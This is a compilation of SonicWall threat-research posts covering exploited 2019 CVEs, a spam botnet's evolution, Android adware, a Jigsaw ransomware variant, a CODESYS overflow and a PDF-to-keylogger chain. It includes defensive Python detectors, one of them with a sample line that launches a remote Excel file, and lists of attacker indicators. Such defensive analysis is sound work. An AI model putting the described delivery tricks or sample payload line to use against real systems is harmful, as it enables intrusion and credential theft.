Top CVE's exploited in the wild

The SonicWALL Capture Labs Threat Research team observed the vulnerabilities below as the ones most exploited by attackers in 2019.

  • BlueKeep (CVE-2019-0708)
  • SharePoint Server (CVE-2019-0604)
  • Win32k (CVE-2019-0859)
  • ThinkPHP (CVE not assigned)
  • Atlassian Confluence (CVE-2019-3396)
  • Drupal (CVE-2019-6340)
  • Oracle WebLogic (CVE-2019-2725)
  • Exim Server (CVE-2019-10149)
  • Microsoft GDI (CVE-2019-0903)
  • Webmin Server (CVE-2019-15107)

BlueKeep (CVE-2019-0708)

A remote code execution vulnerability exists in Remote Desktop Services (formerly known as Terminal Services) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Remote Desktop Services Remote Code Execution Vulnerability’.

Affected Products: Windows 7, Windows XP, Windows Server 2008 and Windows Server 2003.

Reference: https://securitynews.sonicwall.com/xmlpost/rdp-vulnerability-cve-2019-0708/


SharePoint Server (CVE-2019-0604)

An insecure deserialization vulnerability has been reported in Microsoft SharePoint Server. The vulnerability is due to insufficient validation of user-supplied data passed to EntityInstanceIdEncoder.

Affected Products:
Microsoft SharePoint Enterprise Server 2016
Microsoft SharePoint Foundation 2010 & 2013
Microsoft SharePoint Server 2010, 2013 & 2019

Reference: https://securitynews.sonicwall.com/xmlpost/microsoft-sharepoint-server-flaw-cve-2019-0604-is-actively-being-exploited/


Win32k (CVE-2019-0859)

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka ‘Win32k Elevation of Privilege Vulnerability’.

Affected Products:
Microsoft Windows 7, 8.1, 10 & RT 8.1
Microsoft Windows Server 2008, 2012, 2016 & 2019

Reference: https://securitynews.sonicwall.com/xmlpost/cve-2019-0859-exploits-active-in-the-wild/


ThinkPHP (CVE not assigned)

A command execution vulnerability exists in ThinkPHP CMS. The vulnerability is due to improper validation of the URL parameters in App.php.

Reference: https://securitynews.sonicwall.com/xmlpost/thinkphp-remote-code-execution-rce-bug-is-actively-being-exploited/


Atlassian Confluence (CVE-2019-3396)

A server side template injection vulnerability has been reported in Atlassian Confluence Server. This vulnerability is due to improper validation of the _template JSON parameter.

Affected Products:

Atlassian Confluence Server 6.14.x prior to 6.14.2
Atlassian Confluence Server 6.13.x prior to 6.13.3
Atlassian Confluence Server 6.12.x prior to 6.12.3
Atlassian Confluence Server 6.6.x prior to 6.6.12


Drupal (CVE-2019-6340)

A remote code execution vulnerability has been reported in the web services components of Drupal Core. The vulnerability is due to improper sanitization of data for certain Field Types from non-form sources prior to deserialization.

Affected Products:

Drupal 8.5.x prior to 8.5.11
Drupal 8.6.x prior to 8.6.10
Drupal 7.x

Oracle WebLogic (CVE-2019-2725)

An insecure deserialization vulnerability has been reported in Oracle WebLogic. The vulnerability is due to insufficient validation of XML data within the body of HTTP POST requests.

Affected Products:

Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 10.3.6.0.0

Reference: https://securitynews.sonicwall.com/xmlpost/oracle-weblogic-vulnerability-actively-being-exploited-in-the-wild/


Exim Server (CVE-2019-10149)

A remote command injection vulnerability has been reported in the Exim mail server. The vulnerability is due to insufficient handling of the recipient address in the deliver_message() function.

Affected Products: Exim versions 4.87 to 4.91

Reference: https://securitynews.sonicwall.com/xmlpost/exim-email-servers-are-still-under-attack/


Microsoft GDI (CVE-2019-0903)

A remote code execution vulnerability has been reported in the GDI component of Microsoft Windows. The vulnerability is due to the way that GDI handles objects in memory.

Affected Products:

Microsoft Windows 7, 8.1, 10
Microsoft Windows Server 2008, 2008 R2, 2012, 2012 R2, 2016, 2019

Webmin Server (CVE-2019-15107)

A command injection vulnerability has been reported in Webmin. The vulnerability is due to improper validation of user-supplied input within password_change.cgi.

Affected Products: Webmin prior to 1.930

Reference: https://securitynews.sonicwall.com/xmlpost/hackers-continue-to-mount-attacks-on-webmin-servers/


EXIT spammer: Evolution of this work-in-progress spammer executable

The SonicWall Threats Research team has been keeping an eye on the development of the EXIT spammer executable for the last few weeks. The malware author is continuously improving the spammer code to make it more robust and feature-rich. The SonicWall RTDMI ™ engine is proactively detecting all variants of the spammer executable.

The EXIT spammer author started by sending emails to his own email address and has now evolved to sending emails to multiple recipients, dynamically updating the Uniform Resource Locators (URLs) in the email body:


Variant 1 (Self Spamming Executable):

This variant was created by the malware author just to verify that the executable code works. The malware requests Simple Mail Transfer Protocol (SMTP) records from “h[t][t]p://45.138.172.6/check/get.php” and, if the response contains “EXIT;”, terminates execution. An SMTP record contains a “,” separated SMTP host, email address and password:

READS SMTP RECORDS


The malware creates multiple threads that synchronously access an SMTP record and extract values from it. The malware has a list of ports (“25”, “587”, “2525”, “26”, “465”). For each port and Secure Sockets Layer (SSL) flag (true, false) it calls the “SendData” method until the method returns true. The “SendData” method contains the code to send an email and returns true once the email has been sent. It accepts five parameters (host, email address, password, port, SSL flag):


The malware now prepares SMTP client and mail message fields:

SMTP Client Fields

From: email address from the SMTP record, with the display name “Netflix”
To: the author's own email address “test@cafegotta.com”
Subject: “Tu cuenta presenta adeudos y será cerrada. newly,,,”
Body: “~~~[host],[port],[email address],[password],[SSL flag]|||” followed by the other body content, which the malware keeps base64 encoded and decodes at run time

Mail Message Fields

Port: taken from the list of ports
Credentials: email address and password from the SMTP record
EnableSsl: true or false
Timeout: 500

The malware sends emails to its own email address with a Spanish subject that means “Your account has debts and will be closed. newly ,,,”. The malware also puts the sender configuration in the body, so the author can verify at the receiving end which configurations worked for sending email:


The malware author can log in to the email account “test@cafegotta.com” and verify the working sender configuration just by looking at the email body:


Variant 2 (Multiple Recipients Spamming Executable):

The malware author now knows which port and SSL flag worked with which SMTP record, so he has added the working port and SSL flag to the SMTP record. The updated SMTP record now contains a “,” separated host, port, email address, password and SSL flag. The malware reads SMTP records from “h[t][t]p://45.138.172.6/getdata.php” and the recipients list from “h[t][t]p://45.138.172.6/list.txt”.

The malware shuffles the SMTP records and picks a random record to prepare the SMTP client and mail message; it also picks 20 recipients from the recipients list:

SMTP Client Fields

From: email address from the SMTP record, with the display name “servicioalcliente@cfe.gob.mx”
Bcc: 20 recipients from the recipients list
Subject: “Aviso de Factura.”
Body: decoded body content, which the malware keeps base64 encoded

Mail Message Fields

Port: port from the SMTP record
Credentials: email address and password from the SMTP record
EnableSsl: false
Timeout: 3000

The malware keeps sending email using a random SMTP record to 20 recipients at a time until the recipients list is exhausted. The email subject is in Spanish and means “Invoice Notice.”:


The email body contains two hyperlinks that point to the same URL:

Variant change log:

  • Port and SSL flag updated in the SMTP record.
  • Shuffles and picks a random SMTP record.
  • Reads recipients list from URL.
  • Adds recipients to Mail Message “Bcc” instead of “To”.
  • In SMTP client SSL flag is set to “false”.
  • In SMTP client timeout updated to “3000” instead of “500”.
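The two C2 record layouts (Variant 1: host, email, password; Variant 2 onwards: host, port, email, password, SSL flag) and the Variant 1 self-test body marker, turned into a small mail-gateway triage routine. This is an added example, not the spammer's code or SonicWall's detection logic; hostnames and credentials are constructed placeholders, and the display-name check is the editor's suggestion drawn from the spoofed sender names quoted above, not something the write-up describes.

```python
import re
from dataclasses import dataclass
from email.utils import parseaddr
from typing import List, Optional

# --- C2 record formats described in the write-up ---------------------------
# Variant 1:  host,email,password            (port/SSL probed at run time)
# Variant 2+: host,port,email,password,ssl   (working port/SSL stored server side)
# A response containing "EXIT;" tells the bot to stop.

@dataclass
class SmtpRecord:
    host: str
    email: str
    password: str
    port: Optional[int] = None   # None for a Variant 1 record
    ssl: Optional[bool] = None   # None for a Variant 1 record

def parse_smtp_record(line: str) -> Optional[SmtpRecord]:
    """Return the parsed record, or None for the EXIT; response / unknown layout."""
    line = line.strip()
    if "EXIT;" in line:
        return None
    parts = [p.strip() for p in line.split(",")]
    if len(parts) == 3:
        return SmtpRecord(parts[0], parts[1], parts[2])
    if len(parts) == 5 and parts[1].isdigit():
        return SmtpRecord(parts[0], parts[2], parts[3], int(parts[1]),
                          parts[4].lower() == "true")
    return None

# --- Mail-gateway triage ----------------------------------------------------
# Variant 1 self-test mails start the body with "~~~host,port,email,password,ssl|||".
SELFTEST_RE = re.compile(
    r"^~~~(?P<host>[^,|]+),(?P<port>\d+),(?P<email>[^,|]+),(?P<password>[^,|]+),"
    r"(?P<ssl>true|false)\|\|\|", re.IGNORECASE)

# Subjects quoted in the write-up, one per variant.
KNOWN_SUBJECTS = {
    "Tu cuenta presenta adeudos y será cerrada. newly,,,",
    "Aviso de Factura.",
    "Importante. Envío seguro de Comprobantes Fiscales Digitales.",
}

def parse_selftest_marker(body: str) -> Optional[dict]:
    """Extract the abused SMTP account from a Variant 1 self-test body.
    The password is deliberately not returned; host and mailbox are enough to
    notify the owner of the compromised account."""
    m = SELFTEST_RE.match(body)
    if not m:
        return None
    return {"host": m["host"], "port": int(m["port"]), "email": m["email"],
            "ssl": m["ssl"].lower() == "true"}

def display_name_mismatch(from_header: str) -> bool:
    """True when the display name is itself an e-mail address that differs from
    the real sender, e.g. "servicioalcliente@cfe.gob.mx" <bot@compromised.test>."""
    name, addr = parseaddr(from_header)
    return "@" in name and name.strip().lower() != addr.lower()

def triage_message(from_header: str, subject: str, body: str) -> List[str]:
    """Return the reasons a message matches the EXIT spammer pattern ([] if none)."""
    reasons = []
    if parse_selftest_marker(body):
        reasons.append("selftest-marker")
    if subject.strip() in KNOWN_SUBJECTS:
        reasons.append("known-subject")
    if display_name_mismatch(from_header):
        reasons.append("display-name-mismatch")
    return reasons

if __name__ == "__main__":
    # Constructed samples; no real C2 data is reproduced here.
    print(parse_smtp_record("mail.example.test,bot@example.test,s3cret"))
    print(parse_smtp_record("mail.example.test,587,bot@example.test,s3cret,true"))
    print(triage_message('"servicioalcliente@cfe.gob.mx" <bot@example.test>',
                         "Aviso de Factura.", "Estimado cliente ..."))
```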

Variant 3 (Updated URLs executable):

The malware reads the recipients list from “h[t][t]p://45.138.172.6/getdata.php”, which was previously used for SMTP records, and reads SMTP records from the updated URL “h[t][t]p://45.138.172.6/smtp.php”. The malware prepares the SMTP client and Mail Message:

SMTP Client Fields

From: email address from the SMTP record, with the display name “no-reply@facturarenlinea.com.mx”
Bcc: 20 recipients from the recipients list
Subject: “Importante. Envío seguro de Comprobantes Fiscales Digitales.”
Body: decoded body content, which the malware keeps base64 encoded

Mail Message Fields

Port: port from the SMTP record
Credentials: email address and password from the SMTP record
EnableSsl: false
Timeout: 3000

The email subject is in Spanish and means “Important. Secure delivery of Digital Tax Vouchers.”, and the email body contains one hyperlink:


Variant change log:

  • Updated URL for SMTP records and recipients list.
  • Added comments in executable code.


Variant 4 (Dynamic hyper link updater executable):

The malware contains a list of shortened URLs:


The malware replaces “%%link%%” in the email body with a randomly selected shortened URL. This feature allows the malware author to update the URL in the email body without changing the executable code:


The malware prepares the SMTP client and Mail Message:

SMTP Client Fields

From: email address from the SMTP record, with the display name “no-reply@facturarenlinea.com.mx”
Bcc: 20 recipients from the recipients list
Subject: “Importante. Envío seguro de Comprobantes Fiscales Digitales.”
Body: decoded body content, which the malware keeps base64 encoded, after replacing “%%link%%” with the shortened URL

Mail Message Fields

Port: port from the SMTP record
Credentials: email address and password from the SMTP record
EnableSsl: false
Timeout: 3000

The email body contains one shortened hyperlink to download an archive “Factura.zip”, which contains two PDF files:


Variant change log:

  • Replaces “%%link%%” in email body with randomly selected shortened URL.


SMTP records:


Conclusion:

The malware author is regularly updating the EXIT spammer executable code to add functionality. The SonicWall Threats Research team is keeping the EXIT spammer under surveillance and expects more variants in the coming days.


None of the EXIT spammer executable variants were available on popular threat intelligence sharing portals such as VirusTotal and ReversingLabs at the time of writing this blog, which indicates the malware's ability to keep a low profile:


Evidence of the detection of the first variant and the most recent variant by the RTDMI ™ engine can be seen below in the Capture ATP report:

Christmas themed Android malware/adware for 2019

The Christmas season brings new targets and themes for malware writers, who use these themes to lure and infect new victims. The SonicWall Capture Labs Threats Research team searched for Christmas themed Android samples with malicious intentions.

We scanned popular threat portals for Android samples with keywords like ‘Christmas’, ‘Santa Claus’, ‘Holidays’, etc. We observed the following trends among the Android samples with detections. The number of Christmas themed samples increases as the month of December approaches:



  • MD5: dec0a7b5e450139ae1bfcf7e80e9fc8e
  • Package Name: com.amphibius.santa_vs_zombies1

After installation and execution the app displays the menu screen; in the background it communicates with the domain apir.direct-tap.com:

VirusTotal relations show a number of apps with a malicious rating communicating with the domain apir.direct-tap.com:

Once we exit the app, we observed a shortcut created on the home screen:

We observed that this app was present in the assets folder and is stored locally at /storage/emulated/0/temp1/:

Once the app shortcut is clicked, a Google Play Protect prompt appears requesting that the user grant permission to install this app from a custom source:

This is dangerous, as installing apps from sources other than the Play Store is a security risk.


  • MD5: 26fbbe52012d9ba69215892fa32d9fee
  • Package Name: com.infovine.yo.app

After installation and execution this app displays a screen with very few options to click:

In the background the app sends sensitive information about the device to the domain gamedroid.pm. This domain has been observed to communicate with malicious Android apps:

On clicking the ‘proceed’ button, a GET request goes out to despfans.com/minionrushcheats.apk. This domain is currently down, so the apk was not downloaded:

Like the previous app analyzed, this app also places a shortcut on the screen. Upon clicking this shortcut an attempt is made to download an apk from the domain antivirus-pro.us. Since this domain is currently unregistered, the app is not downloaded:

This domain has been observed hosting malicious apps in past scans:



  • MD5: 63b99543b9f87e7718fe5804868fa8c5
  • Package Name: com.gogyimogyi.livewallpaper.goldchristmas3d

We encountered a number of samples with a high detection ratio on VirusTotal as AirPush adware. These samples contain the AirPush advertisement library, which likely triggered the detections.

The VirusTotal graph below for the domain api.airpush.com shows a large number of samples with a high detection ratio communicating with this domain:

Malware writers hide malicious applications under the guise of whatever is currently popular. With Christmas almost upon us, we are seeing an increasing number of malicious Christmas themed Android apps.

SonicWall Capture Labs provides protection against these threats with the following signatures:

  • AndroidOS.InstallApk.GM
  • AndroidOS.Downloader.DN
  • AndroidOS.Airpush.AD_2

Jigsaw ransomware variant: Melka, easily reveals decryption key

The SonicWall Capture Labs Threat Research Team observed reports of another variant of the Jigsaw ransomware spreading in the wild.  The malware is written in .NET and appears to be Czech in origin.  Payment is to be made in bitcoin although it is unclear how much is required for file decryption.

Infection cycle:

The malware executable file contains the following metadata:


Upon execution the following messagebox is displayed:


The malware encrypts files in the background and gives each file a .fun extension.  After this the following dialog is displayed with text emerging character by character:


After the full message is displayed, a 1 hour countdown is started.  The ransom demand translates to a payment of 100 eggs.  We’re not sure what this means:


The dialog also provides a list of files that were encrypted:


The following files are added to the system:

  • %APPDATA%\System32Work\Address.txt (contains bitcoin address: 1Hd3tU8MDmuVotMgGJTJ7svzvPey6bfUgm)
  • %APPDATA%\Frfx\firefox.exe (copy of original malware file [Detected as: GAV: Melka.RSM (Trojan)])
  • %APPDATA%\System32Work\dr (contains “21“)
  • %APPDATA%\System32Work\EncryptedFileList.txt (a list of files that were encrypted)

The following registry key is added:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run firefox.exe “%APPDATA%\Frfx\firefox.exe”

The malware is written in .NET.  A quick decompilation of the malware reveals various routines involved in the encryption and decryption process:


The decryption routine is also easy to find, and the decryption key (“OoIsAwwF32cICQoLDA0ODe==”) is easily revealed:

Further analysis also reveals a list of file extensions that are used to identify files to encrypt:

.jpg .jpeg .raw .tif .gif .png .bmp .3dm .max .accdb .db .dbf .mdb .pdb .sql .dwg .dxf .c .cpp .cs .h .php .asp .rb .java .jar .class .py .js .aaf .aep .aepx .plb .prel .prproj .aet .ppj .psd .indd .indl .indt .indb .inx .idml .pmd .xqx .xqx .ai .eps .ps .svg .swf .fla .as3 .as .txt .doc .dot .docx .docm .dotx .dotm .docb .rtf .wpd .wps .msg .pdf .xls .xlt .xlm .xlsx .xlsm .xltx .xltm .xlsb .xla .xlam .xll .xlw .ppt .pot .pps .pptx .pptm .potx .potm .ppam .ppsx .ppsm .sldx .sldm .wav .mp3 .aif .iff .m3u .m4u .mid .mpa .wma .ra .avi .mov .mp4 .3gp .mpeg .3g2 .asf .asx .flv .mpg .wmv .vob .m3u8 .mkv .dat .csv .efx .sdf .vcf .xml .ses .rar .zip .7zip@


The following strings are also present in the executable file thus identifying it as a Jigsaw ransomware variant:

C:\Users\Admin\Desktop\Melka_vajrus30\JigsawRansomware\JigsawRansomware\obj\Release\MelkaVajrus30.pdb

TxtTest.txt

I am a txt test.

NotTxtTest.nottxt

I am NOT a txt test.

EncryptedFileList.txt


SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Melka.RSM (Trojan)
  • GAV: Jigsaw.RSM_26 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

CODESYS web server buffer overflow CVE-2019-18858

CODESYS
CODESYS is a development environment for programming controller applications.

CODESYS WebVisu
The CODESYS web server is used by CODESYS WebVisu to display CODESYS visualization screens in a web browser. With a controller equipped with CODESYS WebVisu, you can view your CODESYS screens, optimized for a web browser, whenever and wherever you want.

The Vulnerability
CODESYS 3 web server before 3.5.15.20, as distributed with CODESYS Control runtime systems, has a Buffer Overflow. (CVE-2019-18858)
A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold or when a program attempts to put data in a memory area past a buffer. Writing outside the bounds of a block of allocated memory can corrupt data, crash the program, or cause the execution of malicious code.
Specially crafted requests to the CODESYS WebVisu server can lead to a heap buffer overflow. This could crash the web server, lead to a denial-of-service condition, or be used for remote code execution. As the web server is part of the CODESYS runtime system, this may result in unforeseen behavior of the complete runtime system.
A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to the target web server. Successful exploitation results in arbitrary code execution in the security context of the process.

In the case below, the remote attacker POSTs to the WebVisuV3 URL a request containing a special header followed by a long payload (which can be malicious).

The PoC is publicly available here: https://github.com/tenable/poc/blob/master/codesys/codesys_v3_webserver_heap_overflow.py
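A request-replay check for the pattern described above: a POST to the WebVisuV3 endpoint carrying an unusually large body. This is an added example, not SonicWall's IPS logic or the linked PoC; the body-size threshold, the host name and the sample requests are constructed for illustration, and the exact header the PoC sends is not reproduced.

```python
from dataclasses import dataclass, field
from typing import Optional

# Endpoint named in the advisory; the body-size threshold is an assumption for
# illustration and should be tuned to what legitimate WebVisu clients send.
WEBVISU_PATH = "/WebVisuV3"
MAX_WEBVISU_BODY = 1024

@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    body: bytes = b""

def parse_request(raw: bytes) -> Optional[HttpRequest]:
    """Minimal HTTP/1.x request parser for replaying captured requests
    (no chunked transfer encoding). Returns None if the request line is malformed."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    method, target, _version = parts
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    declared = headers.get("content-length", "")
    length = int(declared) if declared.isdigit() else len(body)
    return HttpRequest(method.upper(), target.split("?", 1)[0], headers, body[:length])

def is_suspicious_webvisu_post(req: HttpRequest, limit: int = MAX_WEBVISU_BODY) -> bool:
    """Flag a POST to the WebVisu endpoint whose body exceeds the limit."""
    return (req.method == "POST"
            and req.path.rstrip("/").lower().endswith(WEBVISU_PATH.lower())
            and len(req.body) > limit)

def build_request(path: str, body: bytes) -> bytes:
    """Constructed sample traffic for the demonstration (not real captures)."""
    return (f"POST {path} HTTP/1.1\r\nHost: plc.example.test\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode() + body

if __name__ == "__main__":
    normal = parse_request(build_request("/WebVisuV3", b"\x00\x01small-visu-update"))
    oversized = parse_request(build_request("/WebVisuV3", b"A" * 4096))
    print(is_suspicious_webvisu_post(normal), is_suspicious_webvisu_post(oversized))
```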

Mitigation
Upgrading the CODESYS 3 web server to a version higher than 3.5.15.20 will mitigate the risk.

The SonicWALL Capture Labs Threat Research team provides protection against this threat via the following signatures:
IPS 14673 CoDeSys CmpWebServer Buffer Overflow 2
IPS 14674 CoDeSys CmpWebServer Buffer Overflow 3

Cyber Security News & Trends

This week, SonicWall's warnings about school districts under cyberattack prove prophetic as a new bill to protect K-12 districts is introduced, and did you know that the first ransomware attack was 30 years ago?


SonicWall Spotlight

US Senators Introduce Bill to Protect Schools Against Cyber-Threats – Infosecurity Magazine

  • SonicWall CEO Bill Conner weighs in on the importance of cybersecurity in school districts, commenting on a new bill introduced to the US House of Representatives this week. The bill is designed to enhance the cybersecurity of K–12 schools in a year where they have suffered heavily under cyberattacks.

Cybersecurity News

Hackers Steal Data for 15 Million Patients, Then Sell It Back to Lab That Lost It – Ars Technica

  • Canada’s biggest provider of lab testing services has confirmed it suffered a data breach, with info as old as 2016 accessed. It has also admitted that it made “a payment” to the hackers to retrieve the data, without disclosing exactly how much was paid.

Oil and Gas Industry Risks Escalate, Cybersecurity Should Be Prioritized – HelpNetSecurity

  • A new in-depth report draws on a decade’s worth of cyberattack data in the oil and gas industries, calling for a strengthening of cybersecurity as the risks continue to escalate.

Mobile Devices Account for 41% of DDoS Attack Traffic – Dark Reading

  • While the image DDoS attacks conjure up might be one of racks of computers all being harnessed, the reality right now is that around half of the traffic is now coming from mobile and IoT devices. A newly released report on DDoS attacks looking deeply into the current DDoS threat landscape also finds that China, Turkey, the US, and South Korea are the main sources of the attacks.

WhatsApp Updated to Patch Bug That Allows Attacker to Crash Group Chats – Washington Times

  • Another WhatsApp bug has been discovered and patched. This particular vulnerability allowed a user to send a malicious message to a group chat that would cause the app on every participant’s mobile device to continuously crash.

Maze Ransomware Gang Dumps Purported Victim List – BankInfoSecurity

  • In the latest escalation of ransomware attacks, the gang behind the Maze ransomware is threatening to name and shame victims if they do not pay the ransom. Proving they can make good on their threat, last month the gang published data stolen from a security services firm who did not pay.

10 Cybersecurity Stories in 2019 That Make Us Feel Less Secure – Tech Republic

  • Before looking to the future, we have to look to the past. Tech Republic lists the top 10 2019 cybersecurity stories that worry them the most, including the Capital One breach, juice jacking, and the number of adware attacks like xHelper and Joker in the Android ecosystem.

And Finally

30 Years of Ransomware: How One Bizarre Attack Laid the Foundations for the Malware Taking Over the World – ZDNet

  • Thirty years ago, the first ransomware attack was launched… on a floppy disk… with a PO Box to pay the ransom by postal order or check.

In Case You Missed It

PDF using unseen MS-Office URI-Scheme to run remote office to deliver Key-Logger

Malware authors are using a new technique to run remote Microsoft Office (MS Office) files. SonicWall threat research team has observed a PDF file with embedded JavaScript, which is using MS Office URI scheme to run a remote Microsoft Excel file which is hosted on DropBox.

The PDF file was not detected by any security vendor on the popular threat intelligence sharing portal VirusTotal at the time of writing this blog, which indicates its spreading potential. The PDF file has been available on VirusTotal since 13 December, 2019:

Figure 1 VirusTotal screenshot

The PDF file has an image displaying the message ‘Browser not supported’ and shows steps to open the invoice file.

The PDF file contains JavaScript that invokes the “launchURL” API with the MS Office URI scheme “ms-excel:” to run a remote MS Excel file. The MS Excel filename is made to look like an invoice in order to deceive the user.
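A triage scanner for the trick just described: it pulls JavaScript out of a PDF (literal /JS strings and Flate-compressed streams) and reports any Office URI scheme URL handed to launchURL. This is an added example, not SonicWall's detection; the test documents, the placeholder file-share URL and the “ofe|u|” open-for-edit form of the scheme are constructed for illustration and are not the sample from the write-up.

```python
import re
import zlib
from typing import List

# JavaScript carried as a /JS literal string, and any stream object (inflated if
# FlateDecode). Hex-string /JS values and object streams are out of scope here.
JS_LITERAL_RE = re.compile(rb"/JS\s*\(((?:\\.|[^\\)])*)\)", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.S)
LAUNCH_RE = re.compile(rb"app\s*\.\s*launchURL", re.I)
# Office URI scheme handlers (ms-word:, ms-excel:, ...) hand the URL to a local Office app.
OFFICE_URI_RE = re.compile(
    rb"ms-(?:word|excel|powerpoint|access|project|publisher|visio):[^\s'\"<>)]*", re.I)

def _unescape_literal(s: bytes) -> bytes:
    """Undo the PDF literal-string escapes that matter for URL spotting."""
    return re.sub(rb"\\([()\\])", rb"\1", s)

def _inflate(data: bytes) -> bytes:
    """Inflate a FlateDecode stream; trailing bytes after the zlib data are ignored."""
    try:
        return zlib.decompressobj().decompress(data)
    except zlib.error:
        return data   # not Flate-compressed; scan as-is

def extract_javascript(pdf: bytes) -> List[bytes]:
    """Return candidate script bodies. This is a triage scanner, not a full PDF
    parser, so it looks at string syntax rather than at the object graph."""
    found = [_unescape_literal(m.group(1)) for m in JS_LITERAL_RE.finditer(pdf)]
    found += [_inflate(m.group(1)) for m in STREAM_RE.finditer(pdf)]
    return found

def find_office_uri_launch(pdf: bytes) -> List[str]:
    """Office-scheme URLs passed to launchURL, i.e. the trick in the write-up."""
    hits = []
    for js in extract_javascript(pdf):
        if LAUNCH_RE.search(js):
            hits += [u.decode("latin-1") for u in OFFICE_URI_RE.findall(js)]
    return hits

# --- constructed test documents (not the sample from the write-up) ----------
def build_literal_pdf(js: str) -> bytes:
    """Minimal PDF with an OpenAction whose /JS is a literal string."""
    esc = js.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)")
    return (b"%PDF-1.7\n1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
            b"2 0 obj << /S /JavaScript /JS (" + esc.encode() + b") >> endobj\n"
            b"trailer << /Root 1 0 R >>\n%%EOF\n")

def build_stream_pdf(js: str) -> bytes:
    """Minimal PDF whose /JS points at a FlateDecode stream."""
    data = zlib.compress(js.encode())
    return (b"%PDF-1.7\n2 0 obj << /S /JavaScript /JS 3 0 R >> endobj\n"
            b"3 0 obj << /Length " + str(len(data)).encode()
            + b" /Filter /FlateDecode >>\nstream\n" + data + b"\nendstream\nendobj\n%%EOF\n")

# "ofe|u|" is the Office URI scheme's open-for-edit form; the URL is a placeholder.
SAMPLE_JS = 'app.launchURL("ms-excel:ofe|u|https://files.example.test/s/abc/Invoice.xlsm", true);'

if __name__ == "__main__":
    print(find_office_uri_launch(build_literal_pdf(SAMPLE_JS)))
    print(find_office_uri_launch(build_stream_pdf(SAMPLE_JS)))
```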

Figure 2 PDF file First Page

Figure 3 Embedded JavaScript

The MS Excel file has a macro which takes a hidden command from the Tag attribute of a user form and executes it; the command downloads and executes an XML file containing malicious VBScript. After this, it prompts the message “An attempt was made to load a program with an incorrect format. Document will now EXIT and Open in Default.” and terminates using “Application.Quit”. The message is displayed to mislead the user into thinking that the MS Excel file did not execute. The XML file is downloaded with a misleading “.jpg” file extension.

Figure 4 ScreenShot of Excel File

Figure 5 Macro in Excel File

Figure 6 Command to download and execute XML in the Form tag

The XML file contains embedded VBScript which invokes PowerShell. The PowerShell script downloads an executable file and executes it from %LOCALAPPDATA%.

Figure 7 XML file having embedded VBS file.

Figure 8 Base64 Decode PowerShell cmdlet

Both the XML and executable files are hosted with a ‘jpg’ extension. The executable is a self-extracting PE file with an image icon, to pass as an image file. We have observed that the malware author tries to gain the user’s trust at every stage using simple tricks: hosting the file on Dropbox, using the MS Office URI scheme, posing as an invoice document, showing fake messages and downloading malicious components with image file extensions.

Upon execution, the PE file drops 19 fake files with garbage data, an AutoIT script (“vhctd.von”) and an AutoIT executable (“wxvjlxqa.pif”) in %TEMP%\33775137.

Figure 9 Dropped files

It creates a Run registry entry for the AutoIT executable with the AutoIT script file path as an argument, and executes the AutoIT script using the AutoIT executable. The AutoIT script then launches “RegSvcs.exe” and injects code into it; “RegSvcs.exe” then logs keystrokes and stores them in the registry key “HKCU\Software\Windows Update\[kl]”.

Figure 10 RUN Registry entry

Figure 11 Registry entry which stores the recorded key presses

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV: KeyLogger.PDF_2 (Trojan)

The SonicWall RTDMI ™ engine detects this PDF file, which downloads and executes remote MS Office files.

Cyber Security News & Trends

This week, SonicWall Capture Threat Labs releases data on cyberattacks over the Black Friday and Cyber Monday holiday period, and the cybercriminals involved in the attacks put the stolen data up for sale.


SonicWall Spotlight

Veiled Threats: The Growing Cyberattack Vectors Few People Talk About – Forbes

  • While many people are aware that malware attacks like ransomware can happen through a phishing email or an infected USB key, less well known are the attacks that use encryption or launch using non-standard ports. SonicWall CEO Bill Conner discusses the growth of these veiled threats, and how SonicWall protects from them, in his latest Forbes Technology Council post.

Black Friday Cyberattacks: Businesses Face Surge of Malware, Ransomware on U.S. Shopping Holiday – SonicWall Blog

  • The SonicWall Capture Threat Labs threat researchers released data on cyberattacks across the 2019 Black Friday and Cyber Monday holiday period. In general, there was as much as a 63% surge in malware attacks over the shopping window, with attackers concentrating more on Black Friday than on Cyber Monday.

SonicWall and Veeam Enhance Managed Service Support – Computer Weekly

  • SonicWall’s recently launched My Workspace is covered by Computer Weekly, including SonicWall’s Terry Greer-King explaining why the technology is needed as more customers plan to move to a shared model or fully MSSP mode.

Cybersecurity News

The FBI Is Warning That Your Smart Home Devices Aren’t Secure. Here’s What You Should Do About It – Inc

  • Despite a recent FBI warning about cyberthreats attacking via the Internet of Things, the truth is that most smart devices currently have almost no cybersecurity. With this in mind, Inc takes a look at how to protect your network from cyberattacks, with reference to SonicWall firewalls.

A $200,000 Internet Fraud: Will Anyone Investigate? – BankInfoSecurity

  • The story of a $200,000 phony bank scam exposes the difficulty in getting law enforcement agencies to investigate all but the highest profile internet fraud.

The Case for Cyber Insurance – Security Week

  • As the ongoing case between Mondelez and Zurich American Insurance highlights the complexities in deciding whether or not a cyberattack can be defined as a nation state attack, Security Week makes the case for specifically buying cyber insurance.

TrickBot Gang Is Now a Malware Supplier for North Korean Hackers – ZDNet

  • A newly published report finds that the authors of TrickBot, one of today’s top three malware botnets, have been linked to a North Korean state-sponsored hacking group known as Lazarus.

Cost of Data Breaches in 2019: The 4 Worst Hits on the Corporate Wallet – Security Boulevard

  • British Airways, Capital One, Marriott… some of the biggest breaches in recent times only started to affect the companies involved in 2019. These are not the biggest data breaches by volume, but by cost.

And Finally

Joker’s Stash Celebrates Turkey Day With Stolen Card Data – BankInfoSecurity

